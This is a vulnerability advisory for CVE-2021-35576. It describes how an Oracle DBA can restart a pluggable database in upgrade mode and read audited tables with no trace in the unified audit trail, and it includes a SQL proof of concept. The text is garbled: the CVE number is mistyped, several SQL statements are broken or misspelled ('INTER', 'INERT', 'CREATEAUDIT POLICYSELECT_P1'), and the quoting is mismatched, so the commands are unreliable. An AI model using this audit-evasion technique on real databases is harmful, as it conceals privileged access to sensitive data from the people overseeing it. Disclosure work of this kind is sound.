Title: CVE-2021-35576 – Oracle database system Unified Audit Policy ByPass
Products Database
Oracle Manufacturer
Affected Version(s): 12.1.0.2, 12.2.0.1, 19c
Tested Version(s): 19c
Risk Level: low
Solution Status: Fix
Manufacturer Notification: 2021-03-17
The solution date is 2021-10-17
Public Disclosure: 2022-06-11
CVE Reference: CVE-201-35576
Emad Al-Mousa is the author of this advisory
Overview:
Oracle Database (RDMBS) is a relational database management software that can be used for general purposes.
Unified Auditing can be used to record audit logs from databases. Unified auditing is the supported mechanism to capture audit logs from a range of sources. These views can be accessed by users with the AUDIT_ADMIN or AUDIT_VIEWER roles. You can grant the AUDIT_VIEWER role to users who only want to query views and not create audit policies.
*****************************************
Information about vulnerability
This vulnerability allows a database administrator (or system admin) to gain access to the server database server (either remote authentication or local login), and bypass an in-place audit policy in Oracle database system. The database can be set to upgrade mode, which will prevent auditing. Malicious operations may also be performed without detection.
*****************************************
The Proof of Concept (PoC).
I’ll create a table under the HR schema in PDB1 and add a few records to it:
SQL> CREATE A TABLE HR.EMPLOYEE
(
FIRST_NAME VARCHAR2(50),
LAST_NAME VARCHAR2(50)
);
SQL> INTER HR.EMPLOYEE
FIRST_NAME, LAST_NAME)
VALUES ( EMAD’, MOUSA’ );
SQL> commit;
SQL> INERT INTO HR.EMPLOYEE
FIRST_NAME, LAST_NAME)
VALUES (‘SAMI’ and ‘MOUSA’ );
SQL> commit;
Now, I’ll create an audit policy.
SQL> CREATEAUDIT POLICYSELECT_P1 selects on HR.EMPLOYEE
SQL> audit policy SELECT_P1;
Check the PDB1 database for audit policies
SQL> SELECT * FROM audit_unified_enabled_policies;
Let’s now simulate the execution of the select statement against the audited/monitored table when the database is upgraded:
sqlplus/as sysdba
SQL> Alter session Set Container=PDB1
SQL> Shutdown immediate
SQL> Startup Upgrade
SQL> Select * from HR.EMPLOYEE
Start force for SQL>
SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;
If you use the query to check the audit logs, there is no entry in the unified audit trails.
SQL> select OS_USERNAME,USERHOST,DBUSERNAME,CLIENT_PROGRAM_NAME,EVENT_TIMESTAMP,ACTION_NAME,OBJECT_SCHEMA,OBJECT_NAME,SQL_TEXT from unified_audit_trail where OBJECT_NAME=’EMPLOYEE’ order by EVENT_TIMESTAMP desc;
Even though the audit policy has been configured in the database, a DBA/System Admin may view the audited sensitive tables without a trace. No records will be populated with UNIFIED_AUDIT_TRAIL view!
*****************************************
References:
https://www.oracle.com/security-alerts/cpuoct2021.html
CVE-2021-35576 – Bypassing Unified Audit Policy
https://nvd.nist.gov/vuln/detail/CVE-2021-35576
Credit:
Emad Al-Mousa – CVE-2021-35576